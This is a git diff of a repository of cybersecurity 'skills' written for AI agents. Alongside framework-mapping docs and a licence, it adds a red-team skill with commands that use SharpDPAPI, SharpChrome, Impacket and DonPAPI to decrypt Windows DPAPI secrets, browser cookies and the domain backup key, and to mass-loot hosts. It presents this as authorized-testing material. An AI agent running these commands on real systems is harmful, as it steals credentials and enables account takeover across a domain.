 Every PR is reviewed for technical accuracy and agentskills.io standard compliance within 48 hours.  Check [good first issues](https://github.com/mukul975/Anthropic-Cybersecurity-Skills/issues?q=is%3Aissue+is%3Aopen+label%3A%22good+first+issue%22) for a starting point.
 This project follows the [Contributor Covenant](https://www.contributor-covenant.org/). By participating, you agree to uphold this code. 
 ## Community
 💬 [Discussions](https://github.com/mukul975/Anthropic-Cybersecurity-Skills/discussions) — Questions, ideas, and roadmap conversations
 🐛 [Issues](https://github.com/mukul975/Anthropic-Cybersecurity-Skills/issues) — Bug reports and feature requests
 🔒 [Security Policy](SECURITY.md) — Responsible disclosure process (48-hour acknowledgment) 
 ## Citation
 If you use this project in research or publications:
 ```bibtex
@software{anthropic_cybersecurity_skills,
  author       = {Jangra, Mahipal},
  title        = {Anthropic Cybersecurity Skills},
  year         = {2026},
  url          = {https://github.com/mukul975/Anthropic-Cybersecurity-Skills},
  license      = {Apache-2.0},
  note         = {817 structured cybersecurity skills for AI agents,
                  mapped to MITRE ATT\&CK, NIST CSF 2.0, MITRE ATLAS,
                  MITRE D3FEND, and NIST AI RMF}
 }
 ```
 ## License
-<a href="LICENSE"><img src="https://img.shields.io/badge/license-Apache_2.0-blue.svg?style=flat" alt="License"></a>
+This project is licensed under the [Apache License 2.0](LICENSE). You are free to use, modify, and distribute these skills in both personal and commercial projects. 
-This project is licensed under the Apache License 2.0. See [LICENSE](LICENSE) for details.
+---
 <div align="center">
 **If this project helps your security work, consider giving it a ⭐**
 [⭐ Star](https://github.com/mukul975/Anthropic-Cybersecurity-Skills/stargazers) · [🍴 Fork](https://github.com/mukul975/Anthropic-Cybersecurity-Skills/fork) · [💬 Discuss](https://github.com/mukul975/Anthropic-Cybersecurity-Skills/discussions) · [📝 Contribute](CONTRIBUTING.md)
 Community project by [@mukul975](https://github.com/mukul975). Not affiliated with Anthropic PBC.
 </div>
@@ -0,0 +1,93 @@
 # MITRE Fight Fraud Framework (F3) — Mapping Schema
 This repository maps fraud-relevant skills to the **MITRE Fight Fraud Framework (F3)**,
 released April 9, 2026 by MITRE's Center for Threat-Informed Defense (CTID). F3 is an
 ATT&CK-compatible TTP catalog for cyber-enabled financial fraud.
 - Upstream project: <https://ctid.mitre.org/fraud/>
 - Source repo: <https://github.com/center-for-threat-informed-defense/fight-fraud-framework>
 - License: Apache-2.0
 - Mapped version in this repo: **F3 v1.1**
 ## Why F3 in addition to ATT&CK
 ATT&CK collapses post-compromise fraud into the single `T1657` (Financial Theft)
 technique. F3 decomposes the "how a cyber intrusion becomes a financial loss" stages
 into two dedicated tactics that ATT&CK does not have:
 - **Positioning** (`FA0001`) — after access, collect/manipulate data and prepare the fraud.
 - **Monetization** (`FA0002`) — convert stolen assets into usable funds.
 So `mitre_attack` answers "how did the adversary get in / operate technically" and
 `mitre_f3` answers "how did that turn into money." They are kept as **separate
 frontmatter blocks** because F3 redefines several ATT&CK tactics for the fraud context.
 ## The 8 F3 v1.1 tactics
 | Tactic slug | F3 ID | Origin |
 |---|---|---|
 | `reconnaissance` | TA0043 | ATT&CK (redefined) |
 | `resource-development` | TA0042 | ATT&CK (redefined) |
 | `initial-access` | TA0001 | ATT&CK (redefined) |
 | `stealth` | TA0005 | ATT&CK (redefined) |
 | `positioning` | **FA0001** | **F3-new** |
 | `execution` | TA0002 | ATT&CK (redefined) |
 | `monetization` | **FA0002** | **F3-new** |
 | `defense-impairment` | TA0112 | ATT&CK (redefined) |
 ## Technique ID conventions
 - **`F1XXX`** — fraud-specific techniques introduced by F3 (e.g. `F1005.003`
  Account Manipulation: Add Beneficiary, `F1025.003` Electronic Funds Transfer:
  Wire Transfer, `F1018` Convert to Cryptocurrency).
 - **`T1XXX`** — ATT&CK techniques reused verbatim inside F3 (e.g. `T1566` Phishing,
  `T1586` Compromise Accounts, `T1557` Adversary-in-the-Middle).
 - Sub-techniques use ATT&CK dot notation (`F1005.003`, `T1566.002`).
 Every ID used in this repo is a real, active technique present in the F3 v1.1 STIX
 bundle — there are no `TBD`/placeholder IDs.
 ## Frontmatter schema
 The `mitre_f3` block sits alongside the existing `mitre_attack` block:
 ```yaml
 mitre_f3:
  version: '1.1'
  tactics:
    - positioning
    - monetization
  techniques:
    - id: F1005.003
      name: 'Account Manipulation: Add Beneficiary'
      tactic: positioning
      source: f3          # F-prefixed = fraud-specific
    - id: T1586
      name: Compromise Accounts
      tactic: resource-development
      source: attack      # T-prefixed = reused ATT&CK
 ```
 Rules:
 1. `id` must be a real F3 v1.1 technique ID.
 2. `name` must match the technique's official name in the F3 catalog.
 3. `tactic` must be one the technique actually lists in the catalog.
 4. `source` is `f3` for `F1XXX` IDs and `attack` for `T1XXX` IDs.
 ## Scope
 F3 mappings are applied only to **fraud-relevant skills** — phishing/social
 engineering, account takeover, banking malware/stealers, BEC, identity/KYC,
 payment/card fraud, money-mule/cash-out, ransomware extortion, and the cross-cutting
 DFIR and threat-intelligence skills. Skills with no fraud dimension do not carry an
 `mitre_f3` block.
 ## Regenerating / verifying the catalog
 ```bash
 git clone --depth 1 https://github.com/center-for-threat-informed-defense/fight-fraud-framework
 # technique catalog is the STIX bundle:
 #   fight-fraud-framework/public/f3-stix-v1.1.json
 ```
 All `mitre_f3` IDs in this repo are validated against that bundle on every update.
@@ -1,87 +1,88 @@
-# Security Framework Mappings
+# MITRE ATT&CK Navigator Layer - Anthropic Cybersecurity Skills
-This directory maps the 607+ cybersecurity skills in this repository to industry-standard security frameworks, enabling practitioners and AI agents to discover relevant skills through the lens of established security models.
+This directory contains a MITRE ATT&CK Navigator layer file that maps the coverage of the Anthropic Cybersecurity Skills repository against the ATT&CK Enterprise matrix.
-## Supported Frameworks
+## Files
-### MITRE ATT&CK v15
+| File | Description |
 |------|-------------|
 | `attack-navigator-layer.json` | ATT&CK Navigator layer (v4.5 format, Enterprise ATT&CK v14) |
-The [MITRE ATT&CK](https://attack.mitre.org/) framework is a globally accessible knowledge base of adversary tactics and techniques based on real-world observations. Skills are mapped to:
+## How to View
- **Tactics** (TA00xx) -- the adversary's tactical goals during an operation
+1. Open the [MITRE ATT&CK Navigator](https://mitre-attack.github.io/attack-navigator/)
- **Techniques** (T1xxx) -- the specific methods used to achieve those goals
+2. Click **Open Existing Layer**
- **Sub-techniques** (T1xxx.xxx) -- more granular variations of techniques
+3. Select **Upload from local** and choose `attack-navigator-layer.json`
 4. The matrix will display with blue-shaded techniques indicating coverage
-See [`mitre-attack/`](mitre-attack/) for the full mapping and coverage analysis.
+Alternatively, paste the raw JSON URL into the Navigator's "Load from URL" option if this file is hosted publicly.
-### NIST Cybersecurity Framework 2.0
+## Coverage Statistics
-The [NIST CSF 2.0](https://www.nist.gov/cyberframework) provides a taxonomy of high-level cybersecurity outcomes organized into 6 core functions:
+| Metric | Value |
 |--------|-------|
 | Total skills scanned | 742 |
 | Unique ATT&CK techniques referenced | 218 |
 | Parent techniques | 94 |
 | Sub-techniques | 124 |
 | Tactics with coverage | 14/14 |
-| Function | Code | Description |
+## Coverage by Tactic
 |----------|------|-------------|
 | Govern | GV | Establishing and monitoring cybersecurity risk management strategy |
 | Identify | ID | Understanding organizational cybersecurity risk |
 | Protect | PR | Safeguarding assets through security controls |
 | Detect | DE | Finding and analyzing cybersecurity events |
 | Respond | RS | Taking action regarding detected incidents |
 | Recover | RC | Restoring capabilities after an incident |
-See [`nist-csf/`](nist-csf/) for the full alignment and category mapping.
+| Tactic | Techniques Covered |
 |--------|-------------------|
 | Defense Evasion | 36 |
 | Credential Access | 33 |
 | Persistence | 29 |
 | Initial Access | 17 |
 | Command and Control | 17 |
 | Privilege Escalation | 13 |
 | Discovery | 12 |
 | Exfiltration | 12 |
 | Reconnaissance | 11 |
 | Collection | 10 |
 | Lateral Movement | 9 |
 | Execution | 8 |
 | Resource Development | 6 |
 | Impact | 5 |
-### OWASP Top 10 (2025)
+## Color Scale
-The [OWASP Top 10](https://owasp.org/www-project-top-ten/) represents the most critical security risks to web applications. Skills are mapped to each risk category to provide hands-on remediation and testing capabilities.
+The layer uses a blue gradient to indicate coverage depth:
-See [`owasp/`](owasp/) for the full mapping.
+- **Light blue** (`#cfe2f3`): 1-2 skills reference this technique
 - **Medium blue** (`#6fa8dc`): 3-5 skills reference this technique
 - **Dark blue** (`#3d85c6`): 6-10 skills reference this technique
 - **Deep blue** (`#1155cc`): 11+ skills reference this technique
-## How Mappings Work
+## Top 10 Most Covered Techniques
-Each skill in this repository has YAML frontmatter with `domain`, `subdomain`, and `tags` fields. Framework mappings aggregate skills by subdomain relevance and tag correlation:
+| Technique | Name | Skills |
 |-----------|------|--------|
 | T1059.001 | PowerShell | 26 |
 | T1055 | Process Injection | 17 |
 | T1053.005 | Scheduled Task | 16 |
 | T1566.001 | Spearphishing Attachment | 15 |
 | T1558.003 | Kerberoasting | 14 |
 | T1547.001 | Registry Run Keys / Startup Folder | 13 |
 | T1078 | Valid Accounts | 13 |
 | T1003.006 | DCSync | 13 |
 | T1071.001 | Web Protocols | 12 |
 | T1021.002 | SMB/Windows Admin Shares | 12 |
-```
+## Methodology
 Skill YAML frontmatter
  -> subdomain (e.g., "penetration-testing")
  -> tags (e.g., ["mitre-attack", "privilege-escalation"])
  -> Framework mapping (e.g., ATT&CK TA0004 Privilege Escalation)
 ```
-Mappings are maintained at the subdomain level for scalability. Individual skills may also carry framework-specific tags in their frontmatter for precise lookups.
+Techniques were extracted by scanning all `SKILL.md` files in the repository for ATT&CK technique ID patterns (`T1XXX` and `T1XXX.XXX`). Each technique's score is proportional to the number of distinct skills that reference it, normalized to a 1-100 scale.
-## Subdomain Distribution (607 skills)
+## Layer Format
-| Subdomain | Skills | Primary Frameworks |
+- **Format version**: 4.5
-|-----------|--------|--------------------|
+- **ATT&CK version**: 14 (Enterprise)
-| cloud-security | 48 | ATT&CK, NIST CSF |
+- **Navigator version**: 4.9.1
-| threat-intelligence | 43 | ATT&CK, NIST CSF |
+- **Domain**: enterprise-attack
 | web-application-security | 41 | ATT&CK, OWASP |
 | threat-hunting | 35 | ATT&CK, NIST CSF |
 | digital-forensics | 34 | ATT&CK, NIST CSF |
 | malware-analysis | 34 | ATT&CK, NIST CSF |
 | identity-access-management | 33 | ATT&CK, NIST CSF |
 | network-security | 33 | ATT&CK, NIST CSF |
 | soc-operations | 33 | ATT&CK, NIST CSF |
 | api-security | 28 | OWASP, ATT&CK |
 | ot-ics-security | 28 | ATT&CK (ICS), NIST CSF |
 | container-security | 26 | ATT&CK, NIST CSF |
 | incident-response | 24 | ATT&CK, NIST CSF |
 | vulnerability-management | 24 | ATT&CK, NIST CSF, OWASP |
 | penetration-testing | 23 | ATT&CK |
 | red-teaming | 24 | ATT&CK |
 | devsecops | 16 | NIST CSF, OWASP |
 | endpoint-security | 16 | ATT&CK, NIST CSF |
 | phishing-defense | 16 | ATT&CK, NIST CSF |
 | cryptography | 13 | NIST CSF |
 | zero-trust-architecture | 13 | NIST CSF |
 | mobile-security | 12 | ATT&CK (Mobile), OWASP |
 | compliance-governance | 5 | NIST CSF |
 | ransomware-defense | 5 | ATT&CK, NIST CSF |
-## Contributing
+## Related Links
-To add or update a framework mapping:
+- [MITRE ATT&CK Framework](https://attack.mitre.org/)
-
+- [ATT&CK Navigator](https://mitre-attack.github.io/attack-navigator/)
-1. Identify the skill subdomain and relevant framework category
+- [ATT&CK Navigator GitHub](https://github.com/mitre-attack/attack-navigator)
 2. Update the corresponding mapping file in the framework directory
 3. Ensure the skill's YAML frontmatter tags reflect the mapping
 4. Submit a pull request with the mapping justification
@@ -1,6 +1,6 @@
 # ATT&CK Coverage Summary
-Coverage analysis of the 607 cybersecurity skills mapped to MITRE ATT&CK Enterprise v15 tactics.
+Coverage analysis of the 753 cybersecurity skills mapped to MITRE ATT&CK Enterprise v15 tactics.
 ## Tactic Coverage Matrix
@@ -0,0 +1,201 @@
                                 Apache License
                           Version 2.0, January 2004
                        http://www.apache.org/licenses/
   TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
   1. Definitions.
      "License" shall mean the terms and conditions for use, reproduction,
      and distribution as defined by Sections 1 through 9 of this document.
      "Licensor" shall mean the copyright owner or entity authorized by
      the copyright owner that is granting the License.
      "Legal Entity" shall mean the union of the acting entity and all
      other entities that control, are controlled by, or are under common
      control with that entity. For the purposes of this definition,
      "control" means (i) the power, direct or indirect, to cause the
      direction or management of such entity, whether by contract or
      otherwise, or (ii) ownership of fifty percent (50%) or more of the
      outstanding shares, or (iii) beneficial ownership of such entity.
      "You" (or "Your") shall mean an individual or Legal Entity
      exercising permissions granted by this License.
      "Source" form shall mean the preferred form for making modifications,
      including but not limited to software source code, documentation
      source, and configuration files.
      "Object" form shall mean any form resulting from mechanical
      transformation or translation of a Source form, including but
      not limited to compiled object code, generated documentation,
      and conversions to other media types.
      "Work" shall mean the work of authorship, whether in Source or
      Object form, made available under the License, as indicated by a
      copyright notice that is included in or attached to the work
      (an example is provided in the Appendix below).
      "Derivative Works" shall mean any work, whether in Source or Object
      form, that is based on (or derived from) the Work and for which the
      editorial revisions, annotations, elaborations, or other modifications
      represent, as a whole, an original work of authorship. For the purposes
      of this License, Derivative Works shall not include works that remain
      separable from, or merely link (or bind by name) to the interfaces of,
      the Work and Derivative Works thereof.
      "Contribution" shall mean any work of authorship, including
      the original version of the Work and any modifications or additions
      to that Work or Derivative Works thereof, that is intentionally
      submitted to the Licensor for inclusion in the Work by the copyright owner
      or by an individual or Legal Entity authorized to submit on behalf of
      the copyright owner. For the purposes of this definition, "submitted"
      means any form of electronic, verbal, or written communication sent
      to the Licensor or its representatives, including but not limited to
      communication on electronic mailing lists, source code control systems,
      and issue tracking systems that are managed by, or on behalf of, the
      Licensor for the purpose of discussing and improving the Work, but
      excluding communication that is conspicuously marked or otherwise
      designated in writing by the copyright owner as "Not a Contribution."
      "Contributor" shall mean Licensor and any individual or Legal Entity
      on behalf of whom a Contribution has been received by the Licensor and
      subsequently incorporated within the Work.
   2. Grant of Copyright License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      copyright license to reproduce, prepare Derivative Works of,
      publicly display, publicly perform, sublicense, and distribute the
      Work and such Derivative Works in Source or Object form.
   3. Grant of Patent License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      (except as stated in this section) patent license to make, have made,
      use, offer to sell, sell, import, and otherwise transfer the Work,
      where such license applies only to those patent claims licensable
      by such Contributor that are necessarily infringed by their
      Contribution(s) alone or by combination of their Contribution(s)
      with the Work to which such Contribution(s) was submitted. If You
      institute patent litigation against any entity (including a
      cross-claim or counterclaim in a lawsuit) alleging that the Work
      or a Contribution incorporated within the Work constitutes direct
      or contributory patent infringement, then any patent licenses
      granted to You under this License for that Work shall terminate
      as of the date such litigation is filed.
   4. Redistribution. You may reproduce and distribute copies of the
      Work or Derivative Works thereof in any medium, with or without
      modifications, and in Source or Object form, provided that You
      meet the following conditions:
      (a) You must give any other recipients of the Work or
          Derivative Works a copy of this License; and
      (b) You must cause any modified files to carry prominent notices
          stating that You changed the files; and
      (c) You must retain, in the Source form of any Derivative Works
          that You distribute, all copyright, patent, trademark, and
          attribution notices from the Source form of the Work,
          excluding those notices that do not pertain to any part of
          the Derivative Works; and
      (d) If the Work includes a "NOTICE" text file as part of its
          distribution, then any Derivative Works that You distribute must
          include a readable copy of the attribution notices contained
          within such NOTICE file, excluding any notices that do not
          pertain to any part of the Derivative Works, in at least one
          of the following places: within a NOTICE text file distributed
          as part of the Derivative Works; within the Source form or
          documentation, if provided along with the Derivative Works; or,
          within a display generated by the Derivative Works, if and
          wherever such third-party notices normally appear. The contents
          of the NOTICE file are for informational purposes only and
          do not modify the License. You may add Your own attribution
          notices within Derivative Works that You distribute, alongside
          or as an addendum to the NOTICE text from the Work, provided
          that such additional attribution notices cannot be construed
          as modifying the License.
      You may add Your own copyright statement to Your modifications and
      may provide additional or different license terms and conditions
      for use, reproduction, or distribution of Your modifications, or
      for any such Derivative Works as a whole, provided Your use,
      reproduction, and distribution of the Work otherwise complies with
      the conditions stated in this License.
   5. Submission of Contributions. Unless You explicitly state otherwise,
      any Contribution intentionally submitted for inclusion in the Work
      by You to the Licensor shall be under the terms and conditions of
      this License, without any additional terms or conditions.
      Notwithstanding the above, nothing herein shall supersede or modify
      the terms of any separate license agreement you may have executed
      with Licensor regarding such Contributions.
   6. Trademarks. This License does not grant permission to use the trade
      names, trademarks, service marks, or product names of the Licensor,
      except as required for reasonable and customary use in describing the
      origin of the Work and reproducing the content of the NOTICE file.
   7. Disclaimer of Warranty. Unless required by applicable law or
      agreed to in writing, Licensor provides the Work (and each
      Contributor provides its Contributions) on an "AS IS" BASIS,
      WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
      implied, including, without limitation, any warranties or conditions
      of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
      PARTICULAR PURPOSE. You are solely responsible for determining the
      appropriateness of using or redistributing the Work and assume any
      risks associated with Your exercise of permissions under this License.
   8. Limitation of Liability. In no event and under no legal theory,
      whether in tort (including negligence), contract, or otherwise,
      unless required by applicable law (such as deliberate and grossly
      negligent acts) or agreed to in writing, shall any Contributor be
      liable to You for damages, including any direct, indirect, special,
      incidental, or consequential damages of any character arising as a
      result of this License or out of the use or inability to use the
      Work (including but not limited to damages for loss of goodwill,
      work stoppage, computer failure or malfunction, or any and all
      other commercial damages or losses), even if such Contributor
      has been advised of the possibility of such damages.
   9. Accepting Warranty or Additional Liability. While redistributing
      the Work or Derivative Works thereof, You may choose to offer,
      and charge a fee for, acceptance of support, warranty, indemnity,
      or other liability obligations and/or rights consistent with this
      License. However, in accepting such obligations, You may act only
      on Your own behalf and on Your sole responsibility, not on behalf
      of any other Contributor, and only if You agree to indemnify,
      defend, and hold each Contributor harmless for any liability
      incurred by, or claims asserted against, such Contributor by reason
      of your accepting any such warranty or additional liability.
   END OF TERMS AND CONDITIONS
   APPENDIX: How to apply the Apache License to your work.
      To apply the Apache License to your work, attach the following
      boilerplate notice, with the fields enclosed by brackets "[]"
      replaced with your own identifying information. (Don't include
      the brackets!)  The text should be enclosed in the appropriate
      comment syntax for the file format. Please do not remove or change
      the license header comment from a contributed file except when
      necessary.
   Copyright 2026 mukul975
   Licensed under the Apache License, Version 2.0 (the "License");
   you may not use this file except in compliance with the License.
   You may obtain a copy of the License at
       http://www.apache.org/licenses/LICENSE-2.0
   Unless required by applicable law or agreed to in writing, software
   distributed under the License is distributed on an "AS IS" BASIS,
   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
   See the License for the specific language governing permissions and
   limitations under the License.
@@ -0,0 +1,209 @@
 ---
 name: abusing-dpapi-for-credential-access
 description: Extract DPAPI-protected secrets such as credentials and browser data offline and online.
 domain: cybersecurity
 subdomain: red-teaming
 tags:
 - red-team
 - credential-access
 - dpapi
 - sharpdpapi
 - post-exploitation
 - active-directory
 - windows
 - mimikatz
 version: '1.0'
 author: mahipal
 license: Apache-2.0
 nist_csf:
 - DE.CM-01
 mitre_attack:
 - T1555.004
 ---
 # Abusing DPAPI for Credential Access
 > **Legal Notice:** This skill is for authorized penetration testing, red-team engagements, and educational purposes only. Extracting credentials from systems you do not own or lack explicit written authorization to test is illegal and may violate computer fraud and abuse laws. Always operate within a signed rules-of-engagement and document every action.
 ## Overview
 The Windows Data Protection API (DPAPI) is the operating system's built-in symmetric-encryption service that applications use to protect secrets at rest: saved RDP and Windows Credential Manager credentials, web and Wi-Fi credentials in the Credential Vault, browser saved logins and cookies (Chrome/Edge), KeePass keys, certificate private keys, and Scheduled Task passwords. DPAPI derives a per-user (or per-machine) **master key** from the user's password (or the machine account secret), and that master key encrypts individual "DPAPI blobs." The encrypted master keys live under `%APPDATA%\Microsoft\Protect\<SID>\` (user) and `%WINDIR%\System32\Microsoft\Protect\` (machine).
 Red teamers abuse DPAPI to recover plaintext secrets after gaining a foothold, mapping to MITRE ATT&CK **T1555.004 (Credentials from Password Stores: Windows Credential Manager)**. There are three primary decryption paths:
 1. **Online / context-based** — running as the target user, DPAPI APIs (`CryptUnprotectData`) transparently decrypt the user's blobs. SharpDPAPI's `/unprotect` flag uses this.
 2. **Offline with the user password or NTLM hash** — decrypt the user's master keys with `/password:` or `/ntlm:`, then decrypt the blobs offline (great for triaged files pulled from a host).
 3. **Domain-wide with the DPAPI backup key** — Domain Admins can extract the domain's RSA DPAPI backup key (`.pvk`) once, then decrypt *any* domain user's master keys forever, online or offline, with `/pvk:`.
 The canonical tooling is **SharpDPAPI** (GhostPack, a C# port of Mimikatz DPAPI functionality) for Windows, **SharpChrome** for browser secrets, and **Mimikatz** (`dpapi::*`) as the original implementation. On Linux, Impacket's `dpapi.py` and `donpapi` perform remote/offline triage.
 ## When to Use
 - After compromising a Windows host where the user has saved RDP, browser, or vault credentials worth harvesting for lateral movement.
 - When you hold a user's password or NTLM hash and want to decrypt their DPAPI-protected secrets offline.
 - When you have Domain Admin and want to obtain the domain DPAPI backup key to decrypt any user's protected data across the estate.
 - When triaging exfiltrated `Credentials`, `Vault`, or `Protect` directories from disk images.
 - During purple-team exercises to validate detection of DPAPI master-key access and LSASS/Protect-folder reads.
 ## Prerequisites
 - An authorized foothold (interactive session, beacon, or remote admin) on the target Windows host.
 - Knowledge of the target user's SID, and one of: the user's session, password, NTLM hash, or Domain Admin rights for the backup key.
 - Tooling (compile from source or use release binaries; obtain only from official upstreams):
 ```bash
 # SharpDPAPI / SharpChrome (GhostPack) — build with Visual Studio / msbuild
 git clone https://github.com/GhostPack/SharpDPAPI.git
 # Open SharpDPAPI.sln and build Release, or:
 msbuild SharpDPAPI.sln /p:Configuration=Release
 # Mimikatz (original DPAPI implementation)
 # https://github.com/gentilkiwi/mimikatz/releases
 # Linux remote/offline triage (Impacket)
 pipx install impacket            # provides dpapi.py / impacket-dpapi
 pipx install donpapi             # https://github.com/login-securite/DonPAPI
 ```
 ## Objectives
 - Triage a host for DPAPI-protected credential, vault, RDP, and certificate blobs.
 - Decrypt user master keys online (`/unprotect`), with a password/hash, or with the domain backup key.
 - Recover plaintext Credential Manager and Vault secrets.
 - Extract browser saved logins and cookies with SharpChrome.
 - Obtain and reuse the domain DPAPI backup key for estate-wide decryption.
 ## MITRE ATT&CK Mapping
 | Technique ID | Name | Tactic | Relevance |
 |--------------|------|--------|-----------|
 | T1555.004 | Credentials from Password Stores: Windows Credential Manager | Credential Access | DPAPI protects Credential Manager / Vault entries; decrypting master keys and blobs recovers these stored credentials. |
 | T1555.003 | Credentials from Password Stores: Credentials from Web Browsers | Credential Access | SharpChrome decrypts DPAPI-protected Chrome/Edge logins, cookies, and state keys. |
 | T1003 | OS Credential Dumping | Credential Access | Extracting master keys / backup keys is a form of credential material dumping. |
 ## Workflow
 ### 1. Triage the host for DPAPI blobs
 Run the SharpDPAPI `triage` command in the user's context to automatically enumerate and (where possible) decrypt credentials, vaults, RDG/RDP, and certificates:
 ```powershell
 # Online triage in the current user's context (uses CryptUnprotectData)
 SharpDPAPI.exe triage /unprotect
 # Machine triage (requires local admin / SYSTEM) for machine-scoped blobs
 SharpDPAPI.exe machinetriage
 ```
 ### 2. Decrypt user master keys offline (password or NTLM hash)
 If you hold the user's password or hash, decrypt their master keys to a `{GUID}:SHA1` mapping you can reuse against individual blobs:
 ```powershell
 # Decrypt all of the current/specified user's master keys with the password
 SharpDPAPI.exe masterkeys /password:CorrectHorseBatteryStaple
 # Decrypt master keys with the user's NTLM hash instead of the password
 SharpDPAPI.exe masterkeys /ntlm:cc36cf7a8514893efccd332446158b1a
 # Output is GUID:SHA1 lines — feed them to credentials/vaults commands
 ```
 ### 3. Recover Credential Manager and Vault secrets
 Use the decrypted master-key mapping (or `/pvk:`) to decrypt the stored credentials and vault entries:
 ```powershell
 # Decrypt Credential Manager blobs with a GUID:SHA1 mapping
 SharpDPAPI.exe credentials {GUID1}:SHA1 {GUID2}:SHA1
 # Or point at a target Credentials folder and decrypt with the domain backup key
 SharpDPAPI.exe credentials /target:C:\Users\bob\AppData\Local\Microsoft\Credentials\ /pvk:backupkey.pvk
 # Decrypt Credential Vault entries
 SharpDPAPI.exe vaults /pvk:backupkey.pvk
 ```
 ### 4. Decrypt RDP, KeePass, and certificate secrets
 ```powershell
 # Saved RDCMan.settings RDP passwords (current user context)
 SharpDPAPI.exe rdg /unprotect
 # KeePass DPAPI-protected master keys
 SharpDPAPI.exe keepass /unprotect
 # Certificate private keys (export usable .pem with /showall for all stores)
 SharpDPAPI.exe certificates /unprotect /showall
 ```
 ### 5. Extract browser credentials with SharpChrome
 SharpChrome decrypts Chrome/Edge logins and cookies. Modern Chromium uses an App-Bound "state key" that SharpChrome resolves via DPAPI:
 ```powershell
 # Decrypt saved logins for the current user
 SharpChrome.exe logins /unprotect
 # Decrypt cookies (useful for session hijacking) in a target folder
 SharpChrome.exe cookies /target:"C:\Users\bob\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies" /pvk:backupkey.pvk
 # Resolve the AES state key explicitly
 SharpChrome.exe statekeys /unprotect
 ```
 ### 6. Obtain the domain DPAPI backup key (Domain Admin)
 With Domain Admin, retrieve the domain's RSA DPAPI backup private key once. This key decrypts every domain user's master keys indefinitely:
 ```powershell
 # Pull and save the domain backup key as a .pvk via the MS-BKRP RPC interface
 SharpDPAPI.exe backupkey /server:dc01.corp.local /file:backupkey.pvk
 ```
 Then decrypt any user's master keys offline with it:
 ```powershell
 SharpDPAPI.exe masterkeys /pvk:backupkey.pvk /target:C:\Users\alice\AppData\Roaming\Microsoft\Protect\
 ```
 ### 7. Remote / Linux-based triage (Impacket / DonPAPI)
 From a Linux operator box, harvest and decrypt DPAPI secrets across hosts:
 ```bash
 # Decrypt a single masterkey file with Impacket using the domain backup key
 impacket-dpapi masterkey -file <masterkey_file> -pvk backupkey.pvk
 # Decrypt a credential blob with the recovered masterkey
 impacket-dpapi credential -file <cred_blob> -key 0x<decrypted_masterkey>
 # Mass remote DPAPI looting across hosts with DonPAPI
 donpapi collect -u alice -p 'Password123!' -d corp.local --target 10.0.0.0/24
 ```
 ## Tools and Resources
 | Tool | Purpose | Link |
 |------|---------|------|
 | SharpDPAPI | Windows DPAPI triage/decryption (C#) | https://github.com/GhostPack/SharpDPAPI |
 | SharpChrome | Chromium logins/cookies/state-key decryption | https://github.com/GhostPack/SharpDPAPI |
 | Mimikatz | Original DPAPI (`dpapi::*`) implementation | https://github.com/gentilkiwi/mimikatz |
 | Impacket dpapi.py | Remote/offline DPAPI decryption (Python) | https://github.com/fortra/impacket |
 | DonPAPI | Mass remote DPAPI looting | https://github.com/login-securite/DonPAPI |
 | HackTricks DPAPI | Technique reference | https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.html |
 ## Detection and OPSEC Notes
 - Master-key access and reads of `\Microsoft\Protect\` and `\Microsoft\Credentials\` are detectable; `backupkey` triggers an MS-BKRP RPC call to the DC.
 - The `/unprotect` (online) path is the stealthiest single-host option but only works as the live user.
 - Defenders should monitor for Sysmon process access to LSASS and abnormal access to Protect/Credentials folders (DE.CM-01).
 ## Validation Criteria
 - [ ] Host triaged with `SharpDPAPI triage` / `machinetriage`.
 - [ ] User master keys decrypted via `/unprotect`, `/password:`, `/ntlm:`, or `/pvk:`.
 - [ ] Credential Manager and Vault secrets recovered.
 - [ ] RDP / KeePass / certificate secrets extracted where present.
 - [ ] Browser logins/cookies decrypted with SharpChrome.
 - [ ] Domain DPAPI backup key retrieved with Domain Admin (if in scope) and reused offline.
 - [ ] All recovered secrets documented with source host/user and ROE adherence confirmed.
@@ -0,0 +1,73 @@
 # SharpDPAPI / DPAPI — Command Reference
 ## SharpDPAPI User Commands
 | Command | Purpose | Example |
 |---------|---------|---------|
 | `triage` | Auto-run credentials, vaults, rdg, certificates | `SharpDPAPI.exe triage /unprotect` |
 | `masterkeys` | Decrypt user master keys (GUID:SHA1 output) | `SharpDPAPI.exe masterkeys /password:Pass` |
 | `credentials` | Decrypt Credential Manager blobs | `SharpDPAPI.exe credentials /pvk:key.pvk` |
 | `vaults` | Decrypt Credential Vault entries | `SharpDPAPI.exe vaults /pvk:key.pvk` |
 | `rdg` | Decrypt RDCMan.settings RDP passwords | `SharpDPAPI.exe rdg /unprotect` |
 | `keepass` | Decrypt KeePass DPAPI keys | `SharpDPAPI.exe keepass /unprotect` |
 | `certificates` | Decrypt certificate private keys | `SharpDPAPI.exe certificates /unprotect /showall` |
 ## SharpDPAPI Machine Commands (require admin/SYSTEM)
 | Command | Purpose |
 |---------|---------|
 | `machinemasterkeys` | Decrypt machine master keys (uses DPAPI_SYSTEM LSA secret) |
 | `machinecredentials` | Decrypt machine credential blobs |
 | `machinevaults` | Decrypt machine vault entries |
 | `machinetriage` | Run all machine-scoped triage commands |
 ## SharpDPAPI Supporting Commands
 | Command | Purpose | Example |
 |---------|---------|---------|
 | `backupkey` | Retrieve domain DPAPI backup key (.pvk) via MS-BKRP | `SharpDPAPI.exe backupkey /server:dc01 /file:key.pvk` |
 ## Common Flags
 | Flag | Meaning |
 |------|---------|
 | `/unprotect` | Use live `CryptUnprotectData` in current user context (online) |
 | `/password:<pw>` | Decrypt master keys with the user's plaintext password |
 | `/ntlm:<hash>` | Decrypt master keys with the user's NTLM hash |
 | `/pvk:<file>` | Use domain backup private key for decryption |
 | `/mkfile:<file>` | Provide a specific master key file |
 | `/server:<dc>` | Target DC for backupkey retrieval |
 | `/target:<path>` | Target file/folder to decrypt |
 | `/rpc` | Use RPC to request master key decryption from a DC |
 | `/showall` | Show all certificate stores / verbose output |
 ## SharpChrome Commands
